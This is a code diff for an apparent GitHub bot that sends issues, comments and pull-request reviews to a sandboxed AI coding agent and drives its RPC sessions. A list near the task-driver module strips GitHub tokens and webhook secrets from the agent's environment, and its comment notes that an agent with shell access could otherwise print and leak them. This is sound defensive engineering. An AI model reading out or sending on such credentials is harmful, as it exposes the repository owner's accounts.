issue_row = db.get_issue(issue_row.key) or issue_row
|
||||
return issue_row, pr_info
|
||||
|
||||
|
||||
def _can_handle_pr_directly(*, settings: Settings, repo_full: str, pr: PullRequestInfo) -> bool:
|
||||
"""Only bot-owned same-repo PR branches are safe to amend directly."""
|
||||
if not pr.head_ref:
|
||||
log.info("skip: PR has no head ref", extra={"repo": repo_full, "pr": pr.number})
|
||||
return False
|
||||
if pr.author.lower() != settings.bot_login.lower():
|
||||
log.info(
|
||||
"skip: unmapped PR not authored by bot",
|
||||
extra={"repo": repo_full, "pr": pr.number, "author": pr.author},
|
||||
)
|
||||
return False
|
||||
if pr.head_repo.lower() != repo_full.lower():
|
||||
log.info(
|
||||
"skip: unmapped PR head is not this repo",
|
||||
extra={"repo": repo_full, "pr": pr.number, "head_repo": pr.head_repo},
|
||||
)
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
async def triage_issue(
|
||||
*,
|
||||
settings: Settings,
|
||||
db: Database,
|
||||
github: GitHubBackend,
|
||||
sandbox: SandboxManager,
|
||||
git_transport: GitTransport,
|
||||
payload: Mapping[str, Any],
|
||||
delivery_id: str,
|
||||
attempts: int = 0,
|
||||
slot_uid: int | None = None,
|
||||
) -> None:
|
||||
repo, issue = await _resolve_repo_and_issue(github, payload)
|
||||
if issue.is_pull_request:
|
||||
log.info("skip: triage on PR-like issue", extra={"repo": repo.full_name, "n": issue.number})
|
||||
return
|
||||
key = issue_key(repo.full_name, issue.number)
|
||||
if db.get_issue(key) is None:
|
||||
# First-time triage: bail if a PR (human or another bot) already
|
||||
# claims to close this issue via Closes/Fixes/Resolves syntax or
|
||||
# the Development panel. We never replay closing-PR detection on
|
||||
# a follow-up because by then the bot has already committed
|
||||
# resources (workspace, omp session) to this issue.
|
||||
try:
|
||||
closing_prs = await github.list_closing_pull_requests(repo.full_name, issue.number)
|
||||
except GitHubError as exc:
|
||||
# Fail-open: a transient timeline fetch failure shouldn't
|
||||
# block legitimate triage. Worst case we do redundant work.
|
||||
log.warning(
|
||||
"closing-PR check failed; proceeding with triage",
|
||||
extra={"key": key, "err": str(exc)},
|
||||
)
|
||||
closing_prs = ()
|
||||
if closing_prs:
|
||||
log.info(
|
||||
"skip: issue already covered by an open PR",
|
||||
extra={"key": key, "prs": list(closing_prs)},
|
||||
)
|
||||
return
|
||||
db.upsert_issue(key=key, repo=repo.full_name, number=issue.number, state="reproducing")
|
||||
clone_url = repo.clone_url
|
||||
workspace = sandbox.ensure_workspace(
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
title=issue.title,
|
||||
clone_url=clone_url,
|
||||
default_branch=repo.default_branch,
|
||||
author_name=settings.resolved_author_name,
|
||||
author_email=settings.git_author_email,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
db.upsert_issue(
|
||||
key=key,
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
state="reproducing",
|
||||
branch=workspace.branch,
|
||||
session_dir=str(workspace.session_dir),
|
||||
)
|
||||
inputs = TaskInputs(
|
||||
settings=settings,
|
||||
db=db,
|
||||
github=github,
|
||||
git_transport=git_transport,
|
||||
repo=repo,
|
||||
issue=issue,
|
||||
workspace=workspace,
|
||||
delivery_id=delivery_id,
|
||||
attempts=attempts,
|
||||
slot_uid=slot_uid,
|
||||
natives_cache=sandbox.natives_cache,
|
||||
)
|
||||
await run_task(task_kind="triage_issue", inputs=inputs)
|
||||
|
||||
|
||||
async def handle_comment(
|
||||
*,
|
||||
settings: Settings,
|
||||
db: Database,
|
||||
github: GitHubBackend,
|
||||
sandbox: SandboxManager,
|
||||
git_transport: GitTransport,
|
||||
payload: Mapping[str, Any],
|
||||
delivery_id: str,
|
||||
attempts: int = 0,
|
||||
slot_uid: int | None = None,
|
||||
) -> None:
|
||||
repo, issue = await _resolve_repo_and_issue(github, payload)
|
||||
key = issue_key(repo.full_name, issue.number)
|
||||
existing = db.get_issue(key)
|
||||
directive = _directive_from_payload(payload)
|
||||
comment = _comment_from_payload(payload)
|
||||
clone_url = repo.clone_url
|
||||
|
||||
if existing is None:
|
||||
if directive is None:
|
||||
log.info("skip: comment on unknown issue", extra={"key": key})
|
||||
return
|
||||
# Maintainer summon on an untriaged issue: bootstrap a row + workspace,
|
||||
# then route through triage-with-directive so the agent classifies
|
||||
# first and executes the directive in the same RPC turn.
|
||||
log.info("directive bootstrap", extra={"key": key, "author": directive.author})
|
||||
db.upsert_issue(key=key, repo=repo.full_name, number=issue.number, state="reproducing")
|
||||
workspace = sandbox.ensure_workspace(
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
title=issue.title,
|
||||
clone_url=clone_url,
|
||||
default_branch=repo.default_branch,
|
||||
author_name=settings.resolved_author_name,
|
||||
author_email=settings.git_author_email,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
db.upsert_issue(
|
||||
key=key,
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
state="reproducing",
|
||||
branch=workspace.branch,
|
||||
session_dir=str(workspace.session_dir),
|
||||
)
|
||||
inputs = TaskInputs(
|
||||
settings=settings,
|
||||
db=db,
|
||||
github=github,
|
||||
git_transport=git_transport,
|
||||
repo=repo,
|
||||
issue=issue,
|
||||
workspace=workspace,
|
||||
delivery_id=delivery_id,
|
||||
attempts=attempts,
|
||||
slot_uid=slot_uid,
|
||||
natives_cache=sandbox.natives_cache,
|
||||
)
|
||||
directive = await _attach_thread(github, directive, repo.full_name, issue.number, is_pr=False)
|
||||
await run_task(task_kind="triage_issue", inputs=inputs, directive=directive)
|
||||
return
|
||||
|
||||
if existing.state in ("merged", "closed", "abandoned"):
|
||||
if directive is None:
|
||||
log.info("skip: comment on finalized issue", extra={"key": key, "state": existing.state})
|
||||
try:
|
||||
await github.post_comment(
|
||||
repo.full_name,
|
||||
issue.number,
|
||||
persona.finalized_issue_comment(),
|
||||
)
|
||||
except GitHubError as exc:
|
||||
log.warning("ack comment failed", extra={"err": str(exc)})
|
||||
return
|
||||
# Maintainer reopen: tear down stale workspace, reset state, branch
|
||||
# afresh from default. The old branch may have been merged/deleted.
|
||||
log.info("directive reopen", extra={"key": key, "from_state": existing.state, "author": directive.author})
|
||||
sandbox.remove_workspace(repo=repo.full_name, number=issue.number)
|
||||
db.upsert_issue(key=key, repo=repo.full_name, number=issue.number, state="reproducing")
|
||||
workspace = sandbox.ensure_workspace(
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
title=issue.title,
|
||||
clone_url=clone_url,
|
||||
default_branch=repo.default_branch,
|
||||
author_name=settings.resolved_author_name,
|
||||
author_email=settings.git_author_email,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
db.upsert_issue(
|
||||
key=key,
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
state="reproducing",
|
||||
branch=workspace.branch,
|
||||
session_dir=str(workspace.session_dir),
|
||||
)
|
||||
inputs = TaskInputs(
|
||||
settings=settings,
|
||||
db=db,
|
||||
github=github,
|
||||
git_transport=git_transport,
|
||||
repo=repo,
|
||||
issue=issue,
|
||||
workspace=workspace,
|
||||
delivery_id=delivery_id,
|
||||
attempts=attempts,
|
||||
slot_uid=slot_uid,
|
||||
natives_cache=sandbox.natives_cache,
|
||||
)
|
||||
directive = await _attach_thread(github, directive, repo.full_name, issue.number, is_pr=False)
|
||||
await run_task(task_kind="handle_comment", inputs=inputs, comment=comment, directive=directive)
|
||||
return
|
||||
|
||||
workspace = sandbox.ensure_workspace(
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
title=issue.title,
|
||||
clone_url=clone_url,
|
||||
default_branch=repo.default_branch,
|
||||
existing_branch=existing.branch,
|
||||
author_name=settings.resolved_author_name,
|
||||
author_email=settings.git_author_email,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
inputs = TaskInputs(
|
||||
settings=settings,
|
||||
db=db,
|
||||
github=github,
|
||||
git_transport=git_transport,
|
||||
repo=repo,
|
||||
issue=issue,
|
||||
workspace=workspace,
|
||||
delivery_id=delivery_id,
|
||||
attempts=attempts,
|
||||
slot_uid=slot_uid,
|
||||
natives_cache=sandbox.natives_cache,
|
||||
)
|
||||
directive = await _attach_thread(github, directive, repo.full_name, issue.number, is_pr=False)
|
||||
await run_task(task_kind="handle_comment", inputs=inputs, comment=comment, directive=directive)
|
||||
|
||||
|
||||
async def handle_review(
|
||||
*,
|
||||
settings: Settings,
|
||||
db: Database,
|
||||
github: GitHubBackend,
|
||||
sandbox: SandboxManager,
|
||||
git_transport: GitTransport,
|
||||
payload: Mapping[str, Any],
|
||||
delivery_id: str,
|
||||
attempts: int = 0,
|
||||
slot_uid: int | None = None,
|
||||
) -> None:
|
||||
pr = payload.get("pull_request") or {}
|
||||
pr_number = int(pr.get("number") or 0)
|
||||
if pr_number <= 0:
|
||||
log.info("skip: review without PR number")
|
||||
return
|
||||
repo_payload = payload.get("repository") or {}
|
||||
repo_full = str(repo_payload.get("full_name") or "")
|
||||
if not repo_full:
|
||||
log.info("skip: review without repo")
|
||||
return
|
||||
issue_row, pr_info = await _resolve_issue_row_for_pr(
|
||||
db=db,
|
||||
github=github,
|
||||
repo_full=repo_full,
|
||||
pr_number=pr_number,
|
||||
)
|
||||
if issue_row is None:
|
||||
if pr_info is None or not _can_handle_pr_directly(settings=settings, repo_full=repo_full, pr=pr_info):
|
||||
return
|
||||
issue_number = pr_number
|
||||
existing_branch = pr_info.head_ref
|
||||
else:
|
||||
if issue_row.branch is None:
|
||||
log.info("skip: review PR missing branch mapping", extra={"repo": repo_full, "pr": pr_number})
|
||||
return
|
||||
issue_number = issue_row.number
|
||||
existing_branch = issue_row.branch
|
||||
try:
|
||||
repo = await github.get_repo(repo_full)
|
||||
issue = await github.get_issue(repo_full, issue_number)
|
||||
except GitHubError as exc:
|
||||
log.warning("review fetch failed", extra={"err": str(exc)})
|
||||
return
|
||||
clone_url = repo.clone_url
|
||||
workspace = sandbox.ensure_workspace(
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
title=issue.title,
|
||||
clone_url=clone_url,
|
||||
default_branch=repo.default_branch,
|
||||
existing_branch=existing_branch,
|
||||
author_name=settings.resolved_author_name,
|
||||
author_email=settings.git_author_email,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
if issue_row is None:
|
||||
db.upsert_issue(
|
||||
key=issue_key(repo_full, pr_number),
|
||||
repo=repo_full,
|
||||
number=pr_number,
|
||||
state="opened",
|
||||
branch=workspace.branch,
|
||||
session_dir=str(workspace.session_dir),
|
||||
pr_number=pr_number,
|
||||
)
|
||||
comment = payload.get("comment") or {}
|
||||
user = comment.get("user") or {}
|
||||
review_payload = {
|
||||
"author": str(user.get("login") or ""),
|
||||
"body": str(comment.get("body") or ""),
|
||||
"path": str(comment.get("path") or ""),
|
||||
"line": comment.get("line"),
|
||||
"start_line": comment.get("start_line"),
|
||||
"original_line": comment.get("original_line"),
|
||||
}
|
||||
inputs = TaskInputs(
|
||||
settings=settings,
|
||||
db=db,
|
||||
github=github,
|
||||
git_transport=git_transport,
|
||||
repo=repo,
|
||||
issue=issue,
|
||||
workspace=workspace,
|
||||
delivery_id=delivery_id,
|
||||
attempts=attempts,
|
||||
slot_uid=slot_uid,
|
||||
natives_cache=sandbox.natives_cache,
|
||||
)
|
||||
await run_task(
|
||||
task_kind="handle_review",
|
||||
inputs=inputs,
|
||||
pr_number=pr_number,
|
||||
review_payload=review_payload,
|
||||
)
|
||||
|
||||
|
||||
async def handle_pr_conversation(
|
||||
*,
|
||||
settings: Settings,
|
||||
db: Database,
|
||||
github: GitHubBackend,
|
||||
sandbox: SandboxManager,
|
||||
git_transport: GitTransport,
|
||||
payload: Mapping[str, Any],
|
||||
delivery_id: str,
|
||||
attempts: int = 0,
|
||||
slot_uid: int | None = None,
|
||||
) -> None:
|
||||
"""Handle a regular (non-review) comment on a bot-authored PR.
|
||||
|
||||
The `issue_comment.created` payload's `issue.number` IS the PR number on
|
||||
these events; we resolve back to the originating issue via the DB and
|
||||
drive `handle_comment` so the agent works on the same session/branch.
|
||||
"""
|
||||
repo_payload = payload.get("repository") or {}
|
||||
repo_full = str(repo_payload.get("full_name") or "")
|
||||
issue_payload = payload.get("issue") or {}
|
||||
pr_number = issue_payload.get("number")
|
||||
if not repo_full or not isinstance(pr_number, int):
|
||||
log.info("skip: pr-conversation missing repo/number")
|
||||
return
|
||||
issue_row, pr_info = await _resolve_issue_row_for_pr(
|
||||
db=db,
|
||||
github=github,
|
||||
repo_full=repo_full,
|
||||
pr_number=pr_number,
|
||||
)
|
||||
if issue_row is None:
|
||||
if pr_info is None or not _can_handle_pr_directly(settings=settings, repo_full=repo_full, pr=pr_info):
|
||||
return
|
||||
directive = _directive_from_payload(payload)
|
||||
if issue_row is not None and issue_row.state in ("merged", "closed", "abandoned"):
|
||||
if directive is None:
|
||||
log.info("skip: pr-conversation on finalized issue", extra={"key": issue_row.key, "state": issue_row.state})
|
||||
# Still acknowledge so the reporter knows the bot saw it.
|
||||
try:
|
||||
await github.post_comment(
|
||||
repo_full,
|
||||
pr_number,
|
||||
persona.finalized_pr_comment(),
|
||||
)
|
||||
except GitHubError as exc:
|
||||
log.warning("ack comment failed", extra={"err": str(exc)})
|
||||
return
|
||||
# Maintainer reopen on a finalized PR: tear down stale workspace and
|
||||
# branch afresh on the originating issue. The agent will open a new
|
||||
# PR if code changes ship.
|
||||
log.info(
|
||||
"directive reopen (pr)",
|
||||
extra={"key": issue_row.key, "from_state": issue_row.state, "author": directive.author},
|
||||
)
|
||||
sandbox.remove_workspace(repo=issue_row.repo, number=issue_row.number)
|
||||
db.upsert_issue(key=issue_row.key, repo=issue_row.repo, number=issue_row.number, state="reproducing")
|
||||
issue_row = db.get_issue(issue_row.key) or issue_row
|
||||
# Bare @mention with no request body — the route stashes an empty
|
||||
# _robomp_directive; _directive_from_payload rejects it but the key
|
||||
# being present tells us a mention happened. Reply cheaply without omp.
|
||||
if directive is None and payload.get("_robomp_directive") is not None:
|
||||
comment = _comment_from_payload(payload)
|
||||
log.info(
|
||||
"bare mention, prompting for request", extra={"repo": repo_full, "pr": pr_number, "author": comment.author}
|
||||
)
|
||||
try:
|
||||
await github.post_comment(repo_full, pr_number, persona.bare_mention_reply())
|
||||
except GitHubError as exc:
|
||||
log.warning("bare mention reply failed", extra={"err": str(exc)})
|
||||
return
|
||||
issue_number = issue_row.number if issue_row is not None else pr_number
|
||||
try:
|
||||
repo = await github.get_repo(repo_full)
|
||||
issue = await github.get_issue(repo_full, issue_number)
|
||||
except GitHubError as exc:
|
||||
log.warning("pr-conversation fetch failed", extra={"err": str(exc)})
|
||||
return
|
||||
clone_url = repo.clone_url
|
||||
if issue_row is None:
|
||||
assert pr_info is not None
|
||||
existing_branch = pr_info.head_ref
|
||||
else:
|
||||
# On a reopen the prior branch is stale (merged/deleted), so branch from
|
||||
# default; otherwise reuse the existing branch.
|
||||
existing_branch = (
|
||||
None if directive and issue_row.state == "reproducing" and issue_row.branch is None else issue_row.branch
|
||||
)
|
||||
if existing_branch is None and not (directive and issue_row.state == "reproducing"):
|
||||
log.info("skip: pr-conversation PR missing branch mapping", extra={"repo": repo_full, "pr": pr_number})
|
||||
return
|
||||
workspace = sandbox.ensure_workspace(
|
||||
repo=repo.full_name,
|
||||
number=issue.number,
|
||||
title=issue.title,
|
||||
clone_url=clone_url,
|
||||
default_branch=repo.default_branch,
|
||||
existing_branch=existing_branch,
|
||||
author_name=settings.resolved_author_name,
|
||||
author_email=settings.git_author_email,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
if issue_row is None:
|
||||
db.upsert_issue(
|
||||
key=issue_key(repo_full, pr_number),
|
||||
repo=repo_full,
|
||||
number=pr_number,
|
||||
state="opened",
|
||||
branch=workspace.branch,
|
||||
session_dir=str(workspace.session_dir),
|
||||
pr_number=pr_number,
|
||||
)
|
||||
elif directive is not None and (issue_row.branch is None or issue_row.branch != workspace.branch):
|
||||
db.upsert_issue(
|
||||
key=issue_row.key,
|
||||
repo=issue_row.repo,
|
||||
number=issue_row.number,
|
||||
state="reproducing",
|
||||
branch=workspace.branch,
|
||||
session_dir=str(workspace.session_dir),
|
||||
)
|
||||
comment = _comment_from_payload(payload)
|
||||
inputs = TaskInputs(
|
||||
settings=settings,
|
||||
db=db,
|
||||
github=github,
|
||||
git_transport=git_transport,
|
||||
repo=repo,
|
||||
issue=issue,
|
||||
workspace=workspace,
|
||||
delivery_id=delivery_id,
|
||||
attempts=attempts,
|
||||
slot_uid=slot_uid,
|
||||
natives_cache=sandbox.natives_cache,
|
||||
)
|
||||
directive = await _attach_thread(github, directive, repo_full, pr_number, is_pr=True)
|
||||
await run_task(task_kind="handle_comment", inputs=inputs, comment=comment, pr_number=pr_number, directive=directive)
|
||||
|
||||
|
||||
async def cleanup_workspace(
|
||||
*,
|
||||
settings: Settings,
|
||||
db: Database,
|
||||
sandbox: SandboxManager,
|
||||
payload: Mapping[str, Any],
|
||||
target_state: IssueState,
|
||||
) -> None:
|
||||
"""Tear down the workspace for a finished issue/PR."""
|
||||
repo_payload = payload.get("repository") or {}
|
||||
repo_full = str(repo_payload.get("full_name") or "")
|
||||
if not repo_full:
|
||||
return
|
||||
issue_payload = payload.get("issue") or payload.get("pull_request") or {}
|
||||
number = issue_payload.get("number")
|
||||
if not isinstance(number, int):
|
||||
return
|
||||
# If this is a PR close, map to the originating issue.
|
||||
issue_row: IssueRow | None
|
||||
if "pull_request" in payload:
|
||||
issue_row = db.find_issue_by_pr(repo_full, number)
|
||||
else:
|
||||
issue_row = db.get_issue(issue_key(repo_full, number))
|
||||
if issue_row is None:
|
||||
return
|
||||
sandbox.remove_workspace(repo=issue_row.repo, number=issue_row.number)
|
||||
db.set_issue_state(issue_row.key, target_state)
|
||||
log.info("cleanup", extra={"key": issue_row.key, "state": target_state})
|
||||
|
||||
|
||||
__all__ = [
|
||||
"cleanup_workspace",
|
||||
"handle_comment",
|
||||
"handle_pr_conversation",
|
||||
"handle_review",
|
||||
"triage_issue",
|
||||
]
|
||||
@@ -0,0 +1,689 @@
|
||||
"""Per-task RpcClient driver.
|
||||
|
||||
The orchestrator calls `run_task(...)` from within an asyncio loop. The
|
||||
function spins up `RpcClient` on a worker thread, drives the kickoff/follow-up
|
||||
prompt, and returns when the agent emits `agent_end`.
|
||||
|
||||
Host tools call back into the orchestrator's GitHub client and DB. Because the
|
||||
RpcClient runs in its own subprocess and the host-tool callbacks are dispatched
|
||||
on the RpcClient's stdout-reader thread, the callbacks block until coroutines
|
||||
scheduled onto the parent loop complete (`asyncio.run_coroutine_threadsafe`).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
import os
|
||||
import shutil
|
||||
import threading
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
from omp_rpc import (
|
||||
MessageUpdateEvent,
|
||||
RpcClient,
|
||||
RpcError,
|
||||
RpcProcessExitError,
|
||||
ToolExecutionEndEvent,
|
||||
)
|
||||
|
||||
from robomp import host_tools, persona, pragmas
|
||||
from robomp.cancellation import register_cancel_hook, unregister_cancel_hook
|
||||
from robomp.config import Settings
|
||||
from robomp.db import Database, issue_key
|
||||
from robomp.github_backend import GitHubBackend
|
||||
from robomp.github_client import CommentInfo, IssueInfo, RepoInfo
|
||||
from robomp.host_tools import AbortController, ToolBindings, _git_identity_env
|
||||
from robomp.natives_cache import NativesCache
|
||||
from robomp.natives_cache import compute_key as natives_compute_key
|
||||
from robomp.sandbox import GitTransport, Workspace, _prepare_slot_runtime_env, _safe_directory_env
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
@dataclass(slots=True)
|
||||
class TaskInputs:
|
||||
"""Common context shared by every task type."""
|
||||
|
||||
settings: Settings
|
||||
db: Database
|
||||
github: GitHubBackend
|
||||
git_transport: GitTransport
|
||||
repo: RepoInfo
|
||||
issue: IssueInfo
|
||||
workspace: Workspace
|
||||
delivery_id: str
|
||||
attempts: int = 0
|
||||
slot_uid: int | None = None
|
||||
natives_cache: NativesCache | None = None
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class ThreadMessage:
|
||||
"""One entry in the conversation a directive carries to the agent."""
|
||||
|
||||
kind: str # issue_body | pr_body | comment | review_comment | review
|
||||
author: str
|
||||
body: str
|
||||
created_at: str
|
||||
path: str | None = None # review_comment only
|
||||
line: int | None = None # review_comment only
|
||||
state: str | None = None # review only (APPROVED / CHANGES_REQUESTED / COMMENTED)
|
||||
|
||||
|
||||
@dataclass(slots=True, frozen=True)
|
||||
class DirectiveInfo:
|
||||
"""A maintainer's `@bot` mention captured as an authoritative instruction.
|
||||
|
||||
`thread` is the full conversation context (issue/PR body + every prior
|
||||
comment + every review) up to the moment the directive fired.
|
||||
"""
|
||||
|
||||
body: str
|
||||
author: str
|
||||
thread: tuple[ThreadMessage, ...] = ()
|
||||
pragmas: tuple[tuple[str, str], ...] = ()
|
||||
|
||||
|
||||
def _resolve_pragma_overrides(
|
||||
directive: DirectiveInfo | None,
|
||||
settings: Settings,
|
||||
) -> tuple[str | None, pragmas.ThinkingLevel | None]:
|
||||
"""Return `(model_override, thinking_override)` for the current directive.
|
||||
|
||||
`None` for either means "no override, use the settings default". Aliases
|
||||
that don't match anything in the pool / level set are dropped (caller logs
|
||||
the discard at the callsite that has access to issue_key).
|
||||
"""
|
||||
if directive is None or not directive.pragmas:
|
||||
return None, None
|
||||
model_value = pragmas.pragma_value(directive.pragmas, "model")
|
||||
thinking_value = pragmas.pragma_value(directive.pragmas, "thinking")
|
||||
model_override = pragmas.resolve_model_alias(model_value, settings.model_pool) if model_value else None
|
||||
thinking_override = pragmas.resolve_thinking_level(thinking_value) if thinking_value else None
|
||||
return model_override, thinking_override
|
||||
|
||||
|
||||
_SCRUBBED_ENV_KEYS: tuple[str, ...] = (
|
||||
# Secrets that MUST NOT reach the agent subprocess; an agent with the
|
||||
# `bash` tool could otherwise `printenv` them out of roboomp's env.
|
||||
"GITHUB_TOKEN",
|
||||
"GITHUB_WEBHOOK_SECRET",
|
||||
"ROBOMP_REPLAY_TOKEN",
|
||||
"ROBOMP_GH_PROXY_HMAC_KEY",
|
||||
)
|
||||
|
||||
_AGENT_HOME = Path("/srv/agent-home")
|
||||
_AGENT_HOME_STAGE = Path("/srv/agent-home-stage")
|
||||
|
||||
|
||||
def _stage_agent_home() -> None:
|
||||
"""Copy late-appearing staged agent config into the runtime HOME."""
|
||||
if not _AGENT_HOME_STAGE.exists():
|
||||
return
|
||||
|
||||
for rel in (Path(".agent"), Path(".omp/agent")):
|
||||
src = _AGENT_HOME_STAGE / rel
|
||||
if not src.exists():
|
||||
continue
|
||||
|
||||
dst = _AGENT_HOME / rel
|
||||
try:
|
||||
if os.path.lexists(dst):
|
||||
if dst.is_dir() and not dst.is_symlink():
|
||||
shutil.rmtree(dst)
|
||||
else:
|
||||
dst.unlink()
|
||||
dst.parent.mkdir(parents=True, exist_ok=True)
|
||||
shutil.copytree(src, dst, dirs_exist_ok=True)
|
||||
except OSError as exc:
|
||||
log.warning("Failed to stage agent home path %s: %s", rel, exc)
|
||||
|
||||
if not _AGENT_HOME.exists():
|
||||
return
|
||||
|
||||
chown_to_root = os.geteuid() == 0
|
||||
for root, dirs, files in os.walk(_AGENT_HOME):
|
||||
root_path = Path(root)
|
||||
try:
|
||||
root_path.chmod(0o755)
|
||||
if chown_to_root:
|
||||
os.chown(root_path, 0, 0)
|
||||
except OSError as exc:
|
||||
log.warning("Failed to normalize agent home directory %s: %s", root_path, exc)
|
||||
|
||||
for name in dirs:
|
||||
path = root_path / name
|
||||
try:
|
||||
path.chmod(0o755)
|
||||
if chown_to_root:
|
||||
os.chown(path, 0, 0)
|
||||
except OSError as exc:
|
||||
log.warning("Failed to normalize agent home directory %s: %s", path, exc)
|
||||
|
||||
for name in files:
|
||||
path = root_path / name
|
||||
try:
|
||||
path.chmod(0o644)
|
||||
if chown_to_root:
|
||||
os.chown(path, 0, 0)
|
||||
except OSError as exc:
|
||||
log.warning("Failed to normalize agent home file %s: %s", path, exc)
|
||||
|
||||
|
||||
def _build_extra_env(settings: Settings) -> dict[str, str]:
|
||||
"""Build the env overlay passed to the omp subprocess.
|
||||
|
||||
`omp_rpc` merges this dict on top of `os.environ`, so overlaying empty
|
||||
strings for the sensitive keys is what actually masks them in the
|
||||
child — `del` on the parent's env would not help us here.
|
||||
"""
|
||||
del settings # kept for future hooks (model-specific env, etc.)
|
||||
_stage_agent_home()
|
||||
env = dict.fromkeys(_SCRUBBED_ENV_KEYS, "")
|
||||
if _AGENT_HOME.is_dir():
|
||||
env["HOME"] = str(_AGENT_HOME)
|
||||
return env
|
||||
|
||||
|
||||
_TERMINAL_TRIAGE_TOOLS: frozenset[str] = frozenset({"gh_open_pr", "mark_unable_to_reproduce", "abort_task"})
|
||||
_PR_REQUIRING_CLASSIFICATIONS: frozenset[str] = frozenset({"bug", "documentation"})
|
||||
|
||||
|
||||
def _needs_completion_reminder(
|
||||
*,
|
||||
task_kind: str,
|
||||
inputs: TaskInputs,
|
||||
bindings: ToolBindings,
|
||||
tools_called: set[str],
|
||||
) -> bool:
|
||||
"""True iff a `triage_issue` turn ended before reaching a terminal tool.
|
||||
|
||||
Only enforced for `bug` / `documentation` classifications — `question`,
|
||||
`enhancement`, `proposal`, `invalid`, `duplicate` terminate on a single
|
||||
`gh_post_comment` which we can't reliably distinguish from a preamble.
|
||||
"""
|
||||
if task_kind != "triage_issue":
|
||||
return False
|
||||
if bindings.abort is not None and bindings.abort.triggered:
|
||||
return False
|
||||
row = inputs.db.get_issue(bindings.issue_key)
|
||||
if row is None or row.classification not in _PR_REQUIRING_CLASSIFICATIONS:
|
||||
return False
|
||||
return not (tools_called & _TERMINAL_TRIAGE_TOOLS)
|
||||
|
||||
|
||||
def _drive_turn(
|
||||
client: RpcClient,
|
||||
initial_prompt: str,
|
||||
*,
|
||||
task_kind: str,
|
||||
inputs: TaskInputs,
|
||||
bindings: ToolBindings,
|
||||
tools_called: set[str],
|
||||
) -> Any:
|
||||
"""Run the initial prompt and, if the agent stopped early, send reminders.
|
||||
|
||||
Returns the final `Turn` (last `prompt_and_wait` result), or `None` when
|
||||
the agent intentionally pulled the plug via `abort_task`.
|
||||
"""
|
||||
settings = inputs.settings
|
||||
max_reminders = settings.task_completion_max_reminders
|
||||
|
||||
def _run(prompt: str) -> Any:
|
||||
try:
|
||||
return client.prompt_and_wait(prompt, timeout=settings.task_timeout_seconds)
|
||||
except (RpcError, RpcProcessExitError):
|
||||
# Did the agent intentionally pull the plug via `abort_task`?
|
||||
# If so, swallow — the abort path is a clean exit, not a
|
||||
# failure that should surface in the dashboard or trigger
|
||||
# a comment to the reporter. Anything else propagates.
|
||||
if bindings.abort is not None and bindings.abort.triggered:
|
||||
log.info(
|
||||
"rpc_aborted_by_tool",
|
||||
extra={"issue": bindings.issue_key, "task": task_kind, "reason": bindings.abort.reason},
|
||||
)
|
||||
return None
|
||||
raise
|
||||
|
||||
turn = _run(initial_prompt)
|
||||
if turn is None:
|
||||
return None
|
||||
|
||||
reminders_used = 0
|
||||
while reminders_used < max_reminders and _needs_completion_reminder(
|
||||
task_kind=task_kind, inputs=inputs, bindings=bindings, tools_called=tools_called
|
||||
):
|
||||
reminders_used += 1
|
||||
log.warning(
|
||||
"rpc_completion_reminder",
|
||||
extra={
|
||||
"issue": bindings.issue_key,
|
||||
"task": task_kind,
|
||||
"attempt": reminders_used,
|
||||
"max": max_reminders,
|
||||
},
|
||||
)
|
||||
reminder = persona.completion_reminder(repo=inputs.repo, issue=inputs.issue, workspace=inputs.workspace)
|
||||
next_turn = _run(reminder)
|
||||
if next_turn is None:
|
||||
return None
|
||||
turn = next_turn
|
||||
|
||||
if reminders_used and _needs_completion_reminder(
|
||||
task_kind=task_kind, inputs=inputs, bindings=bindings, tools_called=tools_called
|
||||
):
|
||||
log.warning(
|
||||
"rpc_completion_unfinished",
|
||||
extra={
|
||||
"issue": bindings.issue_key,
|
||||
"task": task_kind,
|
||||
"reminders": reminders_used,
|
||||
"tools_called": sorted(tools_called),
|
||||
},
|
||||
)
|
||||
return turn
|
||||
|
||||
|
||||
def _has_prior_session(session_dir: Path) -> bool:
|
||||
"""Return True iff `session_dir` already contains an omp JSONL transcript.
|
||||
|
||||
pi's `coding-agent` writes one `*.jsonl` per session into `--session-dir`.
|
||||
The presence of any such file is the signal that `--continue` will pick
|
||||
up the most recent transcript (`SessionManager.continueRecent`) rather
|
||||
than starting fresh.
|
||||
"""
|
||||
try:
|
||||
return any(session_dir.glob("*.jsonl"))
|
||||
except OSError:
|
||||
return False
|
||||
|
||||
|
||||
def _build_prompt(
|
||||
task_kind: str,
|
||||
inputs: TaskInputs,
|
||||
*,
|
||||
comment: CommentInfo | None,
|
||||
pr_number: int | None,
|
||||
review_payload: dict[str, Any] | None,
|
||||
directive: DirectiveInfo | None = None,
|
||||
resuming: bool = False,
|
||||
) -> str:
|
||||
if task_kind == "triage_issue":
|
||||
if resuming:
|
||||
return persona.resume_triage(repo=inputs.repo, issue=inputs.issue, workspace=inputs.workspace)
|
||||
if directive is not None:
|
||||
return persona.kickoff_directive(
|
||||
repo=inputs.repo,
|
||||
issue=inputs.issue,
|
||||
workspace=inputs.workspace,
|
||||
directive=directive,
|
||||
)
|
||||
return persona.kickoff(repo=inputs.repo, issue=inputs.issue, workspace=inputs.workspace)
|
||||
if task_kind == "handle_comment":
|
||||
assert comment is not None
|
||||
issue_row = inputs.db.get_issue(issue_key(inputs.repo.full_name, inputs.issue.number))
|
||||
if issue_row is None:
|
||||
